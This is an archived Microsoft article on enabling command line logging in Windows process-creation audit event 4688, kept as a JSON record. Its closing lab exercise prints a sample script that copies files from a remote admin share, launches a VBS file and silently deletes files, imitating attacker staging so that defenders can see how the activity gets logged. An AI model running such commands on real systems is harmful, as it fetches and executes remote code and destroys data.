{
	"id": "ff882cf8-efb6-43c3-a563-5074548e0e9f",
	"created_at": "2026-04-06T00:16:52.268381Z",
	"updated_at": "2026-04-10T03:20:23.905618Z",
	"deleted_at": null,
	"sha1_hash": "ec0baeebb52cea061f058e7210737e77789f91a6",
	"title": "Command line process auditing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 439849,
	"plain_text": "Command line process auditing\r\nBy robinharwood\r\nArchived: 2026-04-05 16:45:29 UTC\r\nAuthor: Justin Turner, Senior Support Escalation Engineer with the Windows group\r\nNote\r\nThis content is written by a Microsoft customer support engineer, and is intended for experienced administrators\r\nand systems architects who are looking for deeper technical explanations of features and solutions in Windows\r\nServer 2012 R2 than topics on TechNet usually provide. However, it has not undergone the same editing passes, so\r\nsome of the language may seem less polished than what is typically found on TechNet.\r\nOverview\r\nThe pre-existing process creation audit event ID 4688 now includes the command line of the created\r\nprocess.\r\nThe SHA1/SHA2 hash of the executable is also logged in the AppLocker event log:\r\nApplication and Services Logs\\Microsoft\\Windows\\AppLocker\r\nThe feature is disabled by default and is enabled through Group Policy with the setting\r\n\"Include command line in process creation events\".\r\nhttps://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nPage 1 of 6\n\nFigure 16: Event 4688\r\nReview the updated event ID 4688 in Figure 16. Prior to this update, none of the\r\ninformation for Process Command Line was logged. 
Because of this additional logging we can now see not\r\nonly that the wscript.exe process was started, but also that it was used to execute a VB script.\r\nConfiguration\r\nTo see the effects of this update, you'll need to enable two policy settings.\r\nYou must have Audit Process Creation auditing enabled to see event ID 4688.\r\nTo enable the Audit Process Creation policy, edit the following group policy:\r\nPolicy location: Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit\r\nConfiguration > Detailed Tracking\r\nPolicy Name: Audit Process Creation\r\nSupported on: Windows 7 and above\r\nDescription/Help:\r\nThis security policy setting determines whether the operating system generates audit events when a process is\r\ncreated (starts) and the name of the program or user that created it.\r\nThese audit events can help you understand how a computer is being used and to track user activity.\r\nEvent volume: Low to medium, depending on system usage\r\nDefault: Not configured\r\nIn order to see the additions to event ID 4688, you must enable the new policy setting: Include\r\ncommand line in process creation events\r\nTable 19: Command line process policy setting\r\nPath: Administrative Templates\\System\\Audit Process Creation\r\nSetting: Include command line in process creation events\r\nDefault setting: Not Configured (not enabled)\r\nSupported on: ?\r\nDescription: This policy setting determines what information is logged in security audit events when a\r\nnew process has been created.\r\nThis setting only applies when the 
Audit Process Creation policy is enabled. If you enable\r\nthis policy setting, the command line information for every process will be logged in plain\r\ntext in the security event log as part of the Audit Process Creation event 4688, \"a new\r\nprocess has been created,\" on the workstations and servers on which this policy setting is\r\napplied.\r\nIf you disable or don't configure this policy setting, the process's command line\r\ninformation won't be included in Audit Process Creation events.\r\nDefault: Not configured\r\nNote: When this policy setting is enabled, any user with access to read the security events\r\nwill be able to read the command line arguments for any successfully created process.\r\nCommand line arguments can contain sensitive or private information such as passwords\r\nor user data.\r\nWhen you use Advanced Audit Policy Configuration settings, you need to confirm that these settings aren't\r\noverwritten by basic audit policy settings. Event 4719 is logged when the settings are overwritten.\r\nThe following procedure shows how to prevent conflicts by blocking the application of any basic audit policy\r\nsettings.\r\nTo ensure that Advanced Audit Policy Configuration settings aren't overwritten\r\n1. Open the Group Policy Management console.\r\n2. Right-click Default Domain Policy, and then select Edit.\r\n3. Double-click Computer Configuration, double-click Policies, and then double-click Windows Settings.\r\n4. Double-click Security Settings, double-click Local Policies, and then select Security Options.\r\n5. 
Double-click Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit\r\npolicy category settings, and then select Define this policy setting.\r\n6. Select Enabled, and then select OK.\r\nAdditional Resources\r\nAudit Process Creation\r\nAdvanced Security Audit Policy Step-by-Step Guide\r\nAppLocker: Frequently Asked Questions\r\nTry This: Explore command line process auditing\r\n1. Enable Audit Process Creation events and ensure the Advanced Audit Policy Configuration isn't\r\noverwritten.\r\n2. Create a script that generates some events of interest and execute the script. Observe the events. The script\r\nused to generate the event in the lesson looked like this:\r\nmkdir c:\\systemfiles\\temp\\commandandcontrol\\zone\\fifthward\r\ncopy \\\\192.168.1.254\\c$\\hidden c:\\systemfiles\\temp\\hidden\\commandandcontrol\\zone\\fifthward\r\nstart C:\\systemfiles\\temp\\hidden\\commandandcontrol\\zone\\fifthward\\ntuserrights.vbs\r\ndel c:\\systemfiles\\temp\\*.* /Q\r\n3. Enable command line process auditing.\r\n4. Execute the same script as before and observe the events.\r\nSource: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"
	],
	"report_names": [
		"command-line-process-auditing"
	],
	"threat_actors": [],
	"ts_created_at": 1775434612,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ec0baeebb52cea061f058e7210737e77789f91a6.pdf",
		"text": "https://archive.orkl.eu/ec0baeebb52cea061f058e7210737e77789f91a6.txt",
		"img": "https://archive.orkl.eu/ec0baeebb52cea061f058e7210737e77789f91a6.jpg"
	}
}